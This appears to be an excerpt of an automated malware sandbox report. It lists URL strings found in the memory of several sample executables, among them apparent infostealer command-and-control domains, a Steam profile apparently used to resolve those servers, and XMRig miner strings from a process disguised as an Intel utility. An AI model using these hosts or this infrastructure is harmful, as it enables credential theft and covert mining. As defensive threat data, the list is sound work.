Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.j
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/
Source: e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/api
Source: e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/apii
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://diffuculttan.xyz/api
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://diffuculttan.xyz/apiG
Source: a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: e66237da20.exe, 00000006.00000003.2872267260.0000000000C72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/06
Source: e66237da20.exe, 00000006.00000003.2872267260.0000000000C72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/9
Source: e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/N
Source: e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/V
Source: e66237da20.exe, 00000006.00000003.2872267260.0000000000C72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/Y
Source: e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api
Source: e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/apik
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: e66237da20.exe, 00000006.00000002.2941784959.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/api
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: skotes.exe, 00000005.00000002.3479841475.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/apiQ
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/apiU
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/N
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: e66237da20.exe, 00000006.00000002.2942461187.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: a98b6b83c7.exe, 00000025.00000003.3327334681.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: a98b6b83c7.exe, 00000025.00000003.3327334681.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: a98b6b83c7.exe, 00000025.00000003.3323554306.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3299285071.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3324958727.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sweepyribs.lat/api
Source: a98b6b83c7.exe, 00000025.00000003.3323554306.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3299285071.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3324958727.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sweepyribs.lat/apione
Source: a98b6b83c7.exe, 00000025.00000003.3323554306.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3324958727.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sweepyribs.lat/go
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/B
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/X
Source: a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: a98b6b83c7.exe, 00000025.00000003.3327334681.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: a98b6b83c7.exe, 00000025.00000003.3327334681.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: a98b6b83c7.exe, 00000025.00000003.3327334681.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: a98b6b83c7.exe, 00000025.00000003.3327334681.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: a98b6b83c7.exe, 00000025.00000003.3327334681.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: a98b6b83c7.exe, 00000025.00000003.3327334681.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2991295379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.3342923144.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2991295379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.3342923144.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2991295379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.3342923144.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
